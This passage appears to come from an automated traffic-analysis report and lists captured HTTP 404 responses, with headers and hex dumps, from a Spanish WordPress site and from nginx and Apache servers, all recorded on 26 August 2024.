6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:28:12 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 26 Aug 2024 16:28:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 26 Aug 2024 16:28:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 26 Aug 2024 16:28:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 26 Aug 2024 16:28:25 GMTContent-Type: text/htmlContent-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:28:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:28:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:28:36 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:28:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:28:45 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 